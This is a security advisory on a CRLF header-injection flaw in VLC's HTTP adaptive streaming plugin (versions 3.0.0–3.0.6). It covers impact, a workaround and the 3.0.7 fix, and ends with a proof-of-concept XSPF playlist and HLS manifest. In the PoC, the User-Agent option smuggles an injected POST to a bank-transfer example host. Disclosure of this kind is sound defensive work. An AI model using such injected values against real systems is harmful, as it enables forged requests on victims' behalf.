VLC adaptive HTTP User-Agent injection vulnerability

Security Advisory

Summary           : Insufficient input validation
                    HTTP protocol injection vulnerability
Date              : 10 June 2019
Affected versions : vlc 3.0.6 down to 3.0.0
Impact            : Arbitrary HTTP requests
CVE ID            : unknown/unassigned
ID                : VLC Trac bug #20813

Details

For unknown reasons, the VLC media player (and underlying LibVLC application library) uses a distinct client implementation of HTTP to perform adaptive network streams such as HTTP Live Streaming (HLS).

Additionally, VLC allows specifying a custom string to use as the HTTP User-Agent header line in HTTP request headers. However, in the case of HTTP adaptive streaming, the custom string is not validated in any way. This allows a malicious network resource to provide an arbitrary byte sequence, including CRLF and thus injects arbitrary header lines in the normal HTTP GET request or even complete arbitrary HTTP request headers (after the GET request).

Impact

If successful, a malicious user could use this vulnerability to craft arbitrary HTTP requests, including nonidempotent and potentially requests such as HTTP POST.

Threat mitigation

An attacker needs to trick the user into opening a crafted playlist manifest.

Workarounds

The only known work-around consists of deleting the adaptive plug-in within the VLC installation, then restarting the application.

The file is normally named libadaptive_plugin.dll, libadaptive_plugin.dylib, or libadaptive_plugin.so depending on the operating system.

Note that this will prevent playing legitimate segmented HTTP streams.

Solution

VLC media player version 3.0.7 includes a fix for this issue.

Credits

This vulnerability was discovered by Rémi Denis-Courmont, and was not sponsored.

References

VLC Trac bug #20813
https://trac.videolan.org/vlc/ticket/20813
Rémi Denis-Courmont
http://www.remlab.net/

History

10 July 2018
Bug reported
23 April 2019
Bug fixed
24 May 2019
VLC 3.0.7 released
10 June 2019
Initial advisory

Example

This sample XSPF playlist shows how to set the HTTP User-Agent to inject an HTTP POST request, which the user must be tricked to open:

<?xml version="1.0" encoding="UTF-8"?>
<playlist
  xmlns="http://xspf.org/ns/0/"
  xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"
  version="1">
  <title>Liste de lecture</title>
  <trackList>
    <track>
      <location>http://www.example.org/stream.m3u8</location>
      <extension application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>0</vlc:id>
        <vlc:option>http-user-agent=Hacked/0&#13;&#10;&#13;&#10;POST /bank-transfer HTTP/1.1&#13;&#10;Host: account.piggy-bank.example.com&#13;&#10;Content-Length: 12&#13;&#10;&#13;&#10;Hello world!</vlc:option>
      </extension>
    </track>
  </trackList>
  <extension application="http://www.videolan.org/vlc/playlist/0">
    <vlc:item tid="0"/>
  </extension>
</playlist>

At www.example.org, the following sample manifest can be used to trigger the VLC HTTP adaptive plugin and select the target web server:

#EXTM3U
#EXT-X-PLAYLIST-TYPE:VOD
#EXT-X-TARGETDURATION:10
#EXT-X-VERSION:3
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://account.piggy-bank.example.com/segment0.ts
#EXT-X-ENDLIST